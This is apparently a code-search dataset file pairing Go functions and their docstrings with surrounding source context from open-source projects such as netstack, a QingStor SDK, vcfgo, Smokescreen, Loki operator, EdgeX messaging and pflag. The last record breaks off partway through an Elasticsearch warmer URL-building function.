repository_name
stringlengths 7
107
| function_path
stringlengths 4
190
| function_identifier
stringlengths 1
236
| language
stringclasses 1
value | function
stringlengths 9
647k
| docstring
stringlengths 5
488k
| function_url
stringlengths 71
285
| context
stringlengths 0
2.51M
| license
stringclasses 5
values |
---|---|---|---|---|---|---|---|---|
google/netstack | tcpip/adapters/gonet/gonet.go | setDeadline | go | func (d *deadlineTimer) setDeadline(cancelCh *chan struct{}, timer **time.Timer, t time.Time) {
if *timer != nil && !(*timer).Stop() {
*cancelCh = make(chan struct{})
}
select {
case <-*cancelCh:
*cancelCh = make(chan struct{})
default:
}
if t.IsZero() {
return
}
timeout := t.Sub(time.Now())
if timeout <= 0 {
close(*cancelCh)
return
}
ch := *cancelCh
*timer = time.AfterFunc(timeout, func() {
close(ch)
})
} | setDeadline contains the shared logic for setting a deadline.
cancelCh and timer must be pointers to deadlineTimer.readCancelCh and
deadlineTimer.readTimer or deadlineTimer.writeCancelCh and
deadlineTimer.writeTimer.
setDeadline must only be called while holding d.mu. | https://github.com/google/netstack/blob/55fcc16cd0eb096d8418f7bc5162483c31a4e82b/tcpip/adapters/gonet/gonet.go#L148-L182 | package gonet
import (
"context"
"errors"
"io"
"net"
"sync"
"time"
"github.com/google/netstack/tcpip"
"github.com/google/netstack/tcpip/buffer"
"github.com/google/netstack/tcpip/stack"
"github.com/google/netstack/tcpip/transport/tcp"
"github.com/google/netstack/tcpip/transport/udp"
"github.com/google/netstack/waiter"
)
var (
errCanceled = errors.New("operation canceled")
errWouldBlock = errors.New("operation would block")
)
type timeoutError struct{}
func (e *timeoutError) Error() string { return "i/o timeout" }
func (e *timeoutError) Timeout() bool { return true }
func (e *timeoutError) Temporary() bool { return true }
type Listener struct {
stack *stack.Stack
ep tcpip.Endpoint
wq *waiter.Queue
cancel chan struct{}
}
func NewListener(s *stack.Stack, addr tcpip.FullAddress, network tcpip.NetworkProtocolNumber) (*Listener, error) {
var wq waiter.Queue
ep, err := s.NewEndpoint(tcp.ProtocolNumber, network, &wq)
if err != nil {
return nil, errors.New(err.String())
}
if err := ep.Bind(addr); err != nil {
ep.Close()
return nil, &net.OpError{
Op: "bind",
Net: "tcp",
Addr: fullToTCPAddr(addr),
Err: errors.New(err.String()),
}
}
if err := ep.Listen(10); err != nil {
ep.Close()
return nil, &net.OpError{
Op: "listen",
Net: "tcp",
Addr: fullToTCPAddr(addr),
Err: errors.New(err.String()),
}
}
return &Listener{
stack: s,
ep: ep,
wq: &wq,
cancel: make(chan struct{}),
}, nil
}
func (l *Listener) Close() error {
l.ep.Close()
return nil
}
func (l *Listener) Shutdown() {
l.ep.Shutdown(tcpip.ShutdownWrite | tcpip.ShutdownRead)
close(l.cancel)
}
func (l *Listener) Addr() net.Addr {
a, err := l.ep.GetLocalAddress()
if err != nil {
return nil
}
return fullToTCPAddr(a)
}
type deadlineTimer struct {
mu sync.Mutex
readTimer *time.Timer
readCancelCh chan struct{}
writeTimer *time.Timer
writeCancelCh chan struct{}
}
func (d *deadlineTimer) init() {
d.readCancelCh = make(chan struct{})
d.writeCancelCh = make(chan struct{})
}
func (d *deadlineTimer) readCancel() <-chan struct{} {
d.mu.Lock()
c := d.readCancelCh
d.mu.Unlock()
return c
}
func (d *deadlineTimer) writeCancel() <-chan struct{} {
d.mu.Lock()
c := d.writeCancelCh
d.mu.Unlock()
return c
} | Apache License 2.0 |
qingstor/qingstor-sdk-go | config/config.go | LoadDefaultConfig | go | func (c *Config) LoadDefaultConfig() (err error) {
logger, _ := zap.NewDevelopment()
c.HTTPSettings = DefaultHTTPClientSettings
err = yaml.Unmarshal([]byte(DefaultConfigFileContent), c)
if err != nil {
logger.Error("load default config", zap.Error(err))
return
}
c.InitHTTPClient()
c.readCredentialFromEnv()
return
} | LoadDefaultConfig loads the default configuration for Config.
It returns error if yaml decode failed. | https://github.com/qingstor/qingstor-sdk-go/blob/a7d593926e41963884c2792f5a9b311fbf891058/config/config.go#L184-L197 | package config
import (
"errors"
"io/ioutil"
"net"
"net/http"
"net/url"
"os"
"strconv"
"strings"
"time"
"go.uber.org/zap"
"gopkg.in/yaml.v2"
"github.com/qingstor/qingstor-sdk-go/v4/utils"
)
type Config struct {
AccessKeyID string `yaml:"access_key_id"`
SecretAccessKey string `yaml:"secret_access_key"`
Host string `yaml:"host"`
Port int `yaml:"port"`
Protocol string `yaml:"protocol"`
Endpoint string `yaml:"endpoint"`
AdditionalUserAgent string `yaml:"additional_user_agent"`
DisableURICleaning bool `yaml:"disable_uri_cleaning"`
LogLevel string `yaml:"log_level"`
EnableVirtualHostStyle bool `yaml:"enable_virtual_host_style"`
EnableDualStack bool `yaml:"enable_dual_stack"`
HTTPSettings HTTPClientSettings
Connection *http.Client
}
type HTTPClientSettings struct {
ConnectTimeout time.Duration `yaml:"connect_timeout"`
ReadTimeout time.Duration `yaml:"read_timeout"`
WriteTimeout time.Duration `yaml:"write_timeout" `
TLSHandshakeTimeout time.Duration `yaml:"tls_timeout"`
IdleConnTimeout time.Duration `yaml:"idle_timeout"`
TCPKeepAlive time.Duration `yaml:"tcp_keepalive_time"`
DualStack bool `yaml:"dual_stack"`
MaxIdleConns int `yaml:"max_idle_conns"`
MaxIdleConnsPerHost int `yaml:"max_idle_conns_per_host"`
ExpectContinueTimeout time.Duration `yaml:"expect_continue_timeout"`
}
var DefaultHTTPClientSettings = HTTPClientSettings{
ConnectTimeout: time.Second * 30,
ReadTimeout: time.Second * 30,
WriteTimeout: time.Second * 30,
TLSHandshakeTimeout: time.Second * 10,
IdleConnTimeout: time.Second * 20,
TCPKeepAlive: 0,
DualStack: false,
MaxIdleConns: 100,
MaxIdleConnsPerHost: 10,
ExpectContinueTimeout: time.Second * 2,
}
func New(accessKeyID, secretAccessKey string) (c *Config, err error) {
c, err = NewDefault()
if err != nil {
c = nil
return
}
c.AccessKeyID = accessKeyID
c.SecretAccessKey = secretAccessKey
return
}
func NewDefault() (c *Config, err error) {
c = &Config{}
err = c.LoadDefaultConfig()
if err != nil {
c = nil
return
}
return
}
func (c *Config) Check() (err error) {
if c.AccessKeyID == "" && c.SecretAccessKey != "" {
err = errors.New("access key ID not specified")
return
}
if c.SecretAccessKey == "" && c.AccessKeyID != "" {
err = errors.New("secret access key not specified")
return
}
if c.Endpoint == "" {
if c.Host == "" {
err = errors.New("server host not specified")
return
}
if c.Port <= 0 {
err = errors.New("server port not specified")
return
}
if c.Protocol == "" {
err = errors.New("server protocol not specified")
return
}
}
if c.AdditionalUserAgent != "" {
for _, x := range c.AdditionalUserAgent {
if int(x) < 32 || int(x) > 126 || int(x) == 32 || int(x) == 34 {
err = errors.New("additional User-Agent contains characters that not allowed")
return
}
}
}
ip := net.ParseIP(c.Host)
if c.EnableVirtualHostStyle {
if ip != nil {
err = errors.New("Host is ip, cannot virtual host style")
return
}
}
if !c.EnableDualStack {
if ip != nil && ip.To4() == nil {
err = errors.New("Host is IPv6 address, enable_dual_stack should be true")
return
}
}
return
} | Apache License 2.0 |
brentp/vcfgo | reader.go | Read | go | func (vr *Reader) Read() *Variant {
line, err := vr.buf.ReadBytes('\n')
if err != nil {
if len(line) == 0 && err == io.EOF {
return nil
} else if err != io.EOF {
vr.verr.Add(err, vr.LineNumber)
}
}
vr.LineNumber++
if line[len(line)-1] == '\n' {
line = line[:len(line)-1]
}
fields := makeFields(line)
return vr.Parse(fields)
} | Read returns a pointer to a Variant. Upon reading the caller is assumed
to check Reader.Err() | https://github.com/brentp/vcfgo/blob/654ed2e5945df15eabbc671fb16556289533f136/reader.go#L174-L191 | package vcfgo
import (
"bufio"
"bytes"
"fmt"
"io"
"log"
"os"
"strconv"
"strings"
"unsafe"
)
const MISSING_VAL = 256
type Reader struct {
buf *bufio.Reader
Header *Header
verr *VCFError
LineNumber int64
lazySamples bool
r io.Reader
}
func NewWithHeader(r io.Reader, h *Header, lazySamples bool) (*Reader, error) {
buf := bufio.NewReaderSize(r, 32768*2)
var verr = NewVCFError()
return &Reader{buf, h, verr, 1, lazySamples, r}, nil
}
func NewReader(r io.Reader, lazySamples bool) (*Reader, error) {
buffered := bufio.NewReaderSize(r, 32768*2)
var verr = NewVCFError()
var LineNumber int64
h := NewHeader()
for {
LineNumber++
line, err := buffered.ReadString('\n')
if err != nil && err != io.EOF {
verr.Add(err, LineNumber)
}
if len(line) > 1 && line[len(line)-1] == '\n' {
line = line[:len(line)-1]
}
if LineNumber == 1 {
v, err := parseHeaderFileVersion(line)
verr.Add(err, LineNumber)
h.FileFormat = v
} else if strings.HasPrefix(line, "##FORMAT") {
format, err := parseHeaderFormat(line)
verr.Add(err, LineNumber)
if format != nil {
h.SampleFormats[format.Id] = format
}
} else if strings.HasPrefix(line, "##INFO") {
info, err := parseHeaderInfo(line)
verr.Add(err, LineNumber)
if info != nil {
h.Infos[info.Id] = info
}
} else if strings.HasPrefix(line, "##FILTER") {
filter, err := parseHeaderFilter(line)
verr.Add(err, LineNumber)
if filter != nil && len(filter) == 2 {
h.Filters[filter[0]] = filter[1]
}
} else if strings.HasPrefix(line, "##contig") {
contig, err := parseHeaderContig(line)
verr.Add(err, LineNumber)
if contig != nil {
if _, ok := contig["ID"]; ok {
h.Contigs = append(h.Contigs, contig)
} else {
verr.Add(fmt.Errorf("bad contig: %v", line), LineNumber)
}
}
} else if strings.HasPrefix(line, "##SAMPLE") {
sample, err := parseHeaderSample(line)
verr.Add(err, LineNumber)
if sample != "" {
h.Samples[sample] = line
} else {
verr.Add(fmt.Errorf("bad sample: %v", line), LineNumber)
}
} else if strings.HasPrefix(line, "##PEDIGREE") {
h.Pedigrees = append(h.Pedigrees, line)
} else if strings.HasPrefix(line, "##") {
kv, err := parseHeaderExtraKV(line)
verr.Add(err, LineNumber)
if kv != nil && len(kv) == 2 {
h.Extras = append(h.Extras, line)
}
} else if strings.HasPrefix(line, "#CHROM") {
var err error
h.SampleNames, err = parseSampleLine(line)
verr.Add(err, LineNumber)
break
} else {
e := fmt.Errorf("unexpected header line: %s", line)
return nil, e
}
}
reader := &Reader{buffered, h, verr, LineNumber, lazySamples, r}
return reader, reader.Error()
}
func makeFields(line []byte) [][]byte {
fields := bytes.SplitN(line, []byte{'\t'}, 9)
s := 0
for i, f := range fields {
if i == 7 {
break
}
s += len(f) + 1
}
if s >= len(line) {
fmt.Fprintf(os.Stderr, "XXXXX: bad VCF line '%s'", line)
return fields
}
e := bytes.IndexByte(line[s:], '\t')
if e == -1 {
e = len(line)
} else {
e += s
}
fields[7] = line[s:e]
return fields
} | MIT License |
skarlso/google-oauth-go-sample | database/mongo.go | SaveUser | go | func (mdb MongoDBConnection) SaveUser(u *structs.User) error {
mdb.session = mdb.GetSession()
defer mdb.session.Close()
if _, err := mdb.LoadUser(u.Email); err == nil {
return fmt.Errorf("user already exists")
}
c := mdb.session.DB("webadventure").C("users")
err := c.Insert(u)
return err
} | SaveUser register a user so we know that we saw that user already. | https://github.com/skarlso/google-oauth-go-sample/blob/450d9f17e43a592d62889eefed93006d5ef5ca7e/database/mongo.go#L17-L26 | package database
import (
"fmt"
"github.com/Skarlso/google-oauth-go-sample/structs"
"gopkg.in/mgo.v2"
"gopkg.in/mgo.v2/bson"
)
type MongoDBConnection struct {
session *mgo.Session
} | MIT License |
stripe/smokescreen | pkg/smokescreen/conntrack/instrumented_conn.go | Idle | go | func (ic *InstrumentedConn) Idle() bool {
if ic.tracker.IdleTimeout == 0 {
return false
}
if time.Since(time.Unix(0, *ic.LastActivity)) > ic.tracker.IdleTimeout {
return true
}
return false
} | Idle returns true when the connection's last activity occured before the
configured idle threshold.
Idle should be called with the connection's lock held. | https://github.com/stripe/smokescreen/blob/dc403015f563eadc556a61870c6ad327688abe88/pkg/smokescreen/conntrack/instrumented_conn.go#L159-L168 | package conntrack
import (
"encoding/json"
"fmt"
"net"
"sync"
"sync/atomic"
"time"
"github.com/sirupsen/logrus"
)
const CanonicalProxyConnClose = "CANONICAL-PROXY-CN-CLOSE"
type InstrumentedConn struct {
net.Conn
Role string
OutboundHost string
proxyType string
ConnError error
tracker *Tracker
logger *logrus.Entry
Start time.Time
LastActivity *int64
timeout time.Duration
BytesIn *uint64
BytesOut *uint64
sync.Mutex
closed bool
CloseError error
}
func (t *Tracker) NewInstrumentedConnWithTimeout(conn net.Conn, timeout time.Duration, logger *logrus.Entry, role, outboundHost, proxyType string) *InstrumentedConn {
ic := t.NewInstrumentedConn(conn, logger, role, outboundHost, proxyType)
ic.timeout = timeout
return ic
}
func (t *Tracker) NewInstrumentedConn(conn net.Conn, logger *logrus.Entry, role, outboundHost, proxyType string) *InstrumentedConn {
now := time.Now()
nowUnixNano := now.UnixNano()
bytesIn := uint64(0)
bytesOut := uint64(0)
ic := &InstrumentedConn{
Conn: conn,
Role: role,
OutboundHost: outboundHost,
tracker: t,
logger: logger,
Start: now,
LastActivity: &nowUnixNano,
BytesIn: &bytesIn,
BytesOut: &bytesOut,
}
ic.tracker.Store(ic, nil)
ic.tracker.Wg.Add(1)
return ic
}
func (ic *InstrumentedConn) Error(err error) {
ic.ConnError = err
}
func (ic *InstrumentedConn) Close() error {
ic.Lock()
defer ic.Unlock()
if ic.closed {
return ic.CloseError
}
ic.closed = true
ic.tracker.Delete(ic)
end := time.Now()
duration := end.Sub(ic.Start).Seconds()
tags := []string{
fmt.Sprintf("role:%s", ic.Role),
}
ic.tracker.statsc.Incr("cn.close", tags, 1)
ic.tracker.statsc.Histogram("cn.duration", duration, tags, 1)
ic.tracker.statsc.Histogram("cn.bytes_in", float64(atomic.LoadUint64(ic.BytesIn)), tags, 1)
ic.tracker.statsc.Histogram("cn.bytes_out", float64(atomic.LoadUint64(ic.BytesOut)), tags, 1)
if ic.tracker.ShuttingDown.Load() == true {
if !ic.Idle() {
ic.logger = ic.logger.WithField("active_at_termination", true)
ic.tracker.statsc.Incr("cn.active_at_termination", tags, 1)
}
}
var errorMessage string
if ic.ConnError != nil {
errorMessage = ic.ConnError.Error()
}
ic.logger.WithFields(logrus.Fields{
"bytes_in": ic.BytesIn,
"bytes_out": ic.BytesOut,
"end_time": end.UTC(),
"duration": duration,
"error": errorMessage,
"last_activity": time.Unix(0, atomic.LoadInt64(ic.LastActivity)).UTC(),
}).Info(CanonicalProxyConnClose)
ic.tracker.Wg.Done()
ic.CloseError = ic.Conn.Close()
return ic.CloseError
}
func (ic *InstrumentedConn) Read(b []byte) (int, error) {
now := time.Now()
if ic.timeout != 0 {
if err := ic.Conn.SetDeadline(now.Add(ic.timeout)); err != nil {
return 0, err
}
}
atomic.StoreInt64(ic.LastActivity, now.UnixNano())
n, err := ic.Conn.Read(b)
atomic.AddUint64(ic.BytesIn, uint64(n))
return n, err
}
func (ic *InstrumentedConn) Write(b []byte) (int, error) {
now := time.Now()
if ic.timeout != 0 {
if err := ic.Conn.SetDeadline(now.Add(ic.timeout)); err != nil {
return 0, err
}
}
atomic.StoreInt64(ic.LastActivity, now.UnixNano())
n, err := ic.Conn.Write(b)
atomic.AddUint64(ic.BytesOut, uint64(n))
return n, err
} | MIT License |
viaq/loki-operator | internal/manifests/service_monitor.go | NewQuerierServiceMonitor | go | func NewQuerierServiceMonitor(opts Options) *monitoringv1.ServiceMonitor {
l := ComponentLabels(LabelQuerierComponent, opts.Name)
serviceMonitorName := serviceMonitorName(QuerierName(opts.Name))
serviceName := serviceNameQuerierHTTP(opts.Name)
lokiEndpoint := serviceMonitorEndpoint(lokiHTTPPortName, serviceName, opts.Namespace, opts.Flags.EnableTLSServiceMonitorConfig)
return newServiceMonitor(opts.Namespace, serviceMonitorName, l, lokiEndpoint)
} | NewQuerierServiceMonitor creates a k8s service monitor for the querier component | https://github.com/viaq/loki-operator/blob/0706b537ffd8aa1cfdcf803f6a8066b3aff85f0e/internal/manifests/service_monitor.go#L49-L57 | package manifests
import (
"github.com/ViaQ/logerr/kverrors"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/labels"
"sigs.k8s.io/controller-runtime/pkg/client"
"github.com/imdario/mergo"
monitoringv1 "github.com/prometheus-operator/prometheus-operator/pkg/apis/monitoring/v1"
)
func BuildServiceMonitors(opts Options) []client.Object {
return []client.Object{
NewDistributorServiceMonitor(opts),
NewIngesterServiceMonitor(opts),
NewQuerierServiceMonitor(opts),
NewCompactorServiceMonitor(opts),
NewQueryFrontendServiceMonitor(opts),
NewGatewayServiceMonitor(opts),
}
}
func NewDistributorServiceMonitor(opts Options) *monitoringv1.ServiceMonitor {
l := ComponentLabels(LabelDistributorComponent, opts.Name)
serviceMonitorName := serviceMonitorName(DistributorName(opts.Name))
serviceName := serviceNameDistributorHTTP(opts.Name)
lokiEndpoint := serviceMonitorEndpoint(lokiHTTPPortName, serviceName, opts.Namespace, opts.Flags.EnableTLSServiceMonitorConfig)
return newServiceMonitor(opts.Namespace, serviceMonitorName, l, lokiEndpoint)
}
func NewIngesterServiceMonitor(opts Options) *monitoringv1.ServiceMonitor {
l := ComponentLabels(LabelIngesterComponent, opts.Name)
serviceMonitorName := serviceMonitorName(IngesterName(opts.Name))
serviceName := serviceNameIngesterHTTP(opts.Name)
lokiEndpoint := serviceMonitorEndpoint(lokiHTTPPortName, serviceName, opts.Namespace, opts.Flags.EnableTLSServiceMonitorConfig)
return newServiceMonitor(opts.Namespace, serviceMonitorName, l, lokiEndpoint)
} | Apache License 2.0 |
mirantis/k8s-appcontroller | pkg/resources/daemonset.go | Create | go | func (d ExistingDaemonSet) Create() error {
return createExistingResource(d)
} | Create looks for existing DaemonSet and returns error if there is no such DaemonSet | https://github.com/mirantis/k8s-appcontroller/blob/437b0eb26b0734b222c8d104d9e6ddd8615286f3/pkg/resources/daemonset.go#L128-L130 | package resources
import (
"log"
"github.com/Mirantis/k8s-AppController/pkg/client"
"github.com/Mirantis/k8s-AppController/pkg/interfaces"
"github.com/Mirantis/k8s-AppController/pkg/report"
"k8s.io/client-go/kubernetes/typed/extensions/v1beta1"
"k8s.io/client-go/pkg/api/v1"
extbeta1 "k8s.io/client-go/pkg/apis/extensions/v1beta1"
)
var daemonSetParamFields = []string{
"Spec.Template.Spec.Containers.Name",
"Spec.Template.Spec.Containers.Env",
"Spec.Template.Spec.InitContainers.Name",
"Spec.Template.Spec.InitContainers.Env",
"Spec.Template.ObjectMeta",
}
type DaemonSet struct {
Base
DaemonSet *extbeta1.DaemonSet
Client v1beta1.DaemonSetInterface
}
type daemonSetTemplateFactory struct{}
func (daemonSetTemplateFactory) ShortName(definition client.ResourceDefinition) string {
if definition.DaemonSet == nil {
return ""
}
return definition.DaemonSet.Name
}
func (daemonSetTemplateFactory) Kind() string {
return "daemonset"
}
func (d daemonSetTemplateFactory) New(def client.ResourceDefinition, c client.Interface, gc interfaces.GraphContext) interfaces.Resource {
newDaemonSet := parametrizeResource(def.DaemonSet, gc, daemonSetParamFields).(*extbeta1.DaemonSet)
return report.SimpleReporter{BaseResource: DaemonSet{Base: Base{def.Meta}, DaemonSet: newDaemonSet, Client: c.DaemonSets()}}
}
func (d daemonSetTemplateFactory) NewExisting(name string, c client.Interface, gc interfaces.GraphContext) interfaces.Resource {
return NewExistingDaemonSet(name, c.DaemonSets())
}
func daemonSetKey(name string) string {
return "daemonset/" + name
}
func daemonSetStatus(d v1beta1.DaemonSetInterface, name string) (interfaces.ResourceStatus, error) {
daemonSet, err := d.Get(name)
if err != nil {
return interfaces.ResourceError, err
}
if daemonSet.Status.CurrentNumberScheduled == daemonSet.Status.DesiredNumberScheduled {
return interfaces.ResourceReady, nil
}
return interfaces.ResourceNotReady, nil
}
func (d DaemonSet) Key() string {
return daemonSetKey(d.DaemonSet.Name)
}
func (d DaemonSet) Status(meta map[string]string) (interfaces.ResourceStatus, error) {
return daemonSetStatus(d.Client, d.DaemonSet.Name)
}
func (d DaemonSet) Create() error {
if err := checkExistence(d); err != nil {
log.Println("Creating", d.Key())
d.DaemonSet, err = d.Client.Create(d.DaemonSet)
return err
}
return nil
}
func (d DaemonSet) Delete() error {
return d.Client.Delete(d.DaemonSet.Name, &v1.DeleteOptions{})
}
type ExistingDaemonSet struct {
Base
Name string
Client v1beta1.DaemonSetInterface
}
func (d ExistingDaemonSet) Key() string {
return daemonSetKey(d.Name)
}
func (d ExistingDaemonSet) Status(meta map[string]string) (interfaces.ResourceStatus, error) {
return daemonSetStatus(d.Client, d.Name)
} | Apache License 2.0 |
edgexfoundry/go-mod-messaging | internal/pkg/mqtt/client.go | newMessageHandler | go | func newMessageHandler(
unmarshaler MessageUnmarshaller,
messageChannel chan<- types.MessageEnvelope,
errorChannel chan<- error) pahoMqtt.MessageHandler {
return func(client pahoMqtt.Client, message pahoMqtt.Message) {
var messageEnvelope types.MessageEnvelope
payload := message.Payload()
err := unmarshaler(payload, &messageEnvelope)
if err != nil {
errorChannel <- err
}
messageEnvelope.ReceivedTopic = message.Topic()
messageChannel <- messageEnvelope
}
} | newMessageHandler creates a function which meets the criteria for a MessageHandler and propagates the received
messages to the proper channel. | https://github.com/edgexfoundry/go-mod-messaging/blob/04d7eb485bae71c4e10a91123812cc18471b7962/internal/pkg/mqtt/client.go#L223-L240 | package mqtt
import (
"crypto/tls"
"encoding/json"
"fmt"
"time"
"github.com/edgexfoundry/go-mod-messaging/v2/internal/pkg"
"github.com/edgexfoundry/go-mod-messaging/v2/pkg/types"
pahoMqtt "github.com/eclipse/paho.mqtt.golang"
)
type ClientCreator func(config types.MessageBusConfig, handler pahoMqtt.OnConnectHandler) (pahoMqtt.Client, error)
type MessageMarshaller func(v interface{}) ([]byte, error)
type MessageUnmarshaller func(data []byte, v interface{}) error
type Client struct {
creator ClientCreator
configuration types.MessageBusConfig
mqttClient pahoMqtt.Client
marshaller MessageMarshaller
unmarshaller MessageUnmarshaller
activeSubscriptions []activeSubscription
}
type activeSubscription struct {
topic string
qos byte
handler pahoMqtt.MessageHandler
errors chan error
}
func NewMQTTClient(config types.MessageBusConfig) (*Client, error) {
client := &Client{
creator: DefaultClientCreator(),
configuration: config,
marshaller: json.Marshal,
unmarshaller: json.Unmarshal,
}
return client, nil
}
func NewMQTTClientWithCreator(
config types.MessageBusConfig,
marshaller MessageMarshaller,
unmarshaller MessageUnmarshaller,
creator ClientCreator) (*Client, error) {
client := &Client{
creator: creator,
configuration: config,
marshaller: marshaller,
unmarshaller: unmarshaller,
}
return client, nil
}
func (mc *Client) Connect() error {
if mc.mqttClient == nil {
mqttClient, err := mc.creator(mc.configuration, mc.onConnectHandler)
if err != nil {
return err
}
mc.mqttClient = mqttClient
}
if mc.mqttClient.IsConnected() {
return nil
}
optionsReader := mc.mqttClient.OptionsReader()
return getTokenError(
mc.mqttClient.Connect(),
optionsReader.ConnectTimeout(),
ConnectOperation,
"Unable to connect")
}
func (mc *Client) onConnectHandler(_ pahoMqtt.Client) {
optionsReader := mc.mqttClient.OptionsReader()
for _, subscription := range mc.activeSubscriptions {
token := mc.mqttClient.Subscribe(subscription.topic, subscription.qos, subscription.handler)
message := fmt.Sprintf("Failed to re-create subscription for topic=%s", subscription.topic)
err := getTokenError(token, optionsReader.ConnectTimeout(), SubscribeOperation, message)
if err != nil {
subscription.errors <- err
}
}
}
func (mc *Client) Publish(message types.MessageEnvelope, topic string) error {
marshaledMessage, err := mc.marshaller(message)
if err != nil {
return NewOperationErr(PublishOperation, err.Error())
}
optionsReader := mc.mqttClient.OptionsReader()
return getTokenError(
mc.mqttClient.Publish(
topic,
optionsReader.WillQos(),
optionsReader.WillRetained(),
marshaledMessage),
optionsReader.ConnectTimeout(),
PublishOperation,
"Unable to publish message")
}
func (mc *Client) Subscribe(topics []types.TopicChannel, messageErrors chan error) error {
optionsReader := mc.mqttClient.OptionsReader()
for _, topic := range topics {
handler := newMessageHandler(mc.unmarshaller, topic.Messages, messageErrors)
qos := optionsReader.WillQos()
token := mc.mqttClient.Subscribe(topic.Topic, qos, handler)
err := getTokenError(token, optionsReader.ConnectTimeout(), SubscribeOperation, "Failed to create subscription")
if err != nil {
return err
}
mc.activeSubscriptions = append(mc.activeSubscriptions, activeSubscription{
topic: topic.Topic,
qos: qos,
handler: handler,
errors: messageErrors,
})
}
return nil
}
func (mc *Client) Disconnect() error {
optionsReader := mc.mqttClient.OptionsReader()
mc.mqttClient.Disconnect(uint(optionsReader.ConnectTimeout() * time.Millisecond))
return nil
}
func DefaultClientCreator() ClientCreator {
return func(config types.MessageBusConfig, handler pahoMqtt.OnConnectHandler) (pahoMqtt.Client, error) {
clientConfiguration, err := CreateMQTTClientConfiguration(config)
if err != nil {
return nil, err
}
clientOptions, err := createClientOptions(clientConfiguration, tls.X509KeyPair, tls.LoadX509KeyPair)
if err != nil {
return nil, err
}
clientOptions.OnConnect = handler
return pahoMqtt.NewClient(clientOptions), nil
}
}
func ClientCreatorWithCertLoader(certCreator pkg.X509KeyPairCreator, certLoader pkg.X509KeyLoader) ClientCreator {
return func(options types.MessageBusConfig, handler pahoMqtt.OnConnectHandler) (pahoMqtt.Client, error) {
clientConfiguration, err := CreateMQTTClientConfiguration(options)
if err != nil {
return nil, err
}
clientOptions, err := createClientOptions(clientConfiguration, certCreator, certLoader)
if err != nil {
return nil, err
}
clientOptions.OnConnect = handler
return pahoMqtt.NewClient(clientOptions), nil
}
} | Apache License 2.0 |
palantir/amalgomate | vendor/github.com/spf13/pflag/float32_slice.go | Float32SliceP | go | func (f *FlagSet) Float32SliceP(name, shorthand string, value []float32, usage string) *[]float32 {
p := []float32{}
f.Float32SliceVarP(&p, name, shorthand, value, usage)
return &p
} | Float32SliceP is like Float32Slice, but accepts a shorthand letter that can be used after a single dash. | https://github.com/palantir/amalgomate/blob/93940ef386d2ff55837e12e26e360d6e1d938f50/vendor/github.com/spf13/pflag/float32_slice.go#L159-L163 | package pflag
import (
"fmt"
"strconv"
"strings"
)
type float32SliceValue struct {
value *[]float32
changed bool
}
func newFloat32SliceValue(val []float32, p *[]float32) *float32SliceValue {
isv := new(float32SliceValue)
isv.value = p
*isv.value = val
return isv
}
func (s *float32SliceValue) Set(val string) error {
ss := strings.Split(val, ",")
out := make([]float32, len(ss))
for i, d := range ss {
var err error
var temp64 float64
temp64, err = strconv.ParseFloat(d, 32)
if err != nil {
return err
}
out[i] = float32(temp64)
}
if !s.changed {
*s.value = out
} else {
*s.value = append(*s.value, out...)
}
s.changed = true
return nil
}
func (s *float32SliceValue) Type() string {
return "float32Slice"
}
func (s *float32SliceValue) String() string {
out := make([]string, len(*s.value))
for i, d := range *s.value {
out[i] = fmt.Sprintf("%f", d)
}
return "[" + strings.Join(out, ",") + "]"
}
func (s *float32SliceValue) fromString(val string) (float32, error) {
t64, err := strconv.ParseFloat(val, 32)
if err != nil {
return 0, err
}
return float32(t64), nil
}
func (s *float32SliceValue) toString(val float32) string {
return fmt.Sprintf("%f", val)
}
func (s *float32SliceValue) Append(val string) error {
i, err := s.fromString(val)
if err != nil {
return err
}
*s.value = append(*s.value, i)
return nil
}
func (s *float32SliceValue) Replace(val []string) error {
out := make([]float32, len(val))
for i, d := range val {
var err error
out[i], err = s.fromString(d)
if err != nil {
return err
}
}
*s.value = out
return nil
}
func (s *float32SliceValue) GetSlice() []string {
out := make([]string, len(*s.value))
for i, d := range *s.value {
out[i] = s.toString(d)
}
return out
}
func float32SliceConv(val string) (interface{}, error) {
val = strings.Trim(val, "[]")
if len(val) == 0 {
return []float32{}, nil
}
ss := strings.Split(val, ",")
out := make([]float32, len(ss))
for i, d := range ss {
var err error
var temp64 float64
temp64, err = strconv.ParseFloat(d, 32)
if err != nil {
return nil, err
}
out[i] = float32(temp64)
}
return out, nil
}
func (f *FlagSet) GetFloat32Slice(name string) ([]float32, error) {
val, err := f.getFlagType(name, "float32Slice", float32SliceConv)
if err != nil {
return []float32{}, err
}
return val.([]float32), nil
}
func (f *FlagSet) Float32SliceVar(p *[]float32, name string, value []float32, usage string) {
f.VarP(newFloat32SliceValue(value, p), name, "", usage)
}
func (f *FlagSet) Float32SliceVarP(p *[]float32, name, shorthand string, value []float32, usage string) {
f.VarP(newFloat32SliceValue(value, p), name, shorthand, usage)
}
func Float32SliceVar(p *[]float32, name string, value []float32, usage string) {
CommandLine.VarP(newFloat32SliceValue(value, p), name, "", usage)
}
func Float32SliceVarP(p *[]float32, name, shorthand string, value []float32, usage string) {
CommandLine.VarP(newFloat32SliceValue(value, p), name, shorthand, usage)
}
func (f *FlagSet) Float32Slice(name string, value []float32, usage string) *[]float32 {
p := []float32{}
f.Float32SliceVarP(&p, name, "", value, usage)
return &p
} | Apache License 2.0 |
grimmer0125/search-github-starred | vendor/github.com/grimmer0125/elastic/indices_get_warmer.go | buildURL | go | func (s *IndicesGetWarmerService) buildURL() (string, url.Values, error) {
var err error
var path string
if len(s.index) == 0 && len(s.typ) == 0 && len(s.name) == 0 {
path = "/_warmer"
} else if len(s.index) == 0 && len(s.typ) == 0 && len(s.name) > 0 {
path, err = uritemplates.Expand("/_warmer/{name}", map[string]string{
"name": strings.Join(s.name, ","),
})
} else if len(s.index) == 0 && len(s.typ) > 0 && len(s.name) == 0 {
path, err = uritemplates.Expand("/_all/{type}/_warmer", map[string]string{
"type": strings.Join(s.typ, ","),
})
} else if len(s.index) == 0 && len(s.typ) > 0 && len(s.name) > 0 {
path, err = uritemplates.Expand("/_all/{type}/_warmer/{name}", map[string]string{
"type": strings.Join(s.typ, ","),
"name": strings.Join(s.name, ","),
})
} else if len(s.index) > 0 && len(s.typ) == 0 && len(s.name) == 0 {
path, err = uritemplates.Expand("/{index}/_warmer", map[string]string{
"index": strings.Join(s.index, ","),
})
} else if len(s.index) > 0 && len(s.typ) == 0 && len(s.name) > 0 {
path, err = uritemplates.Expand("/{index}/_warmer/{name}", map[string]string{
"index": strings.Join(s.index, ","),
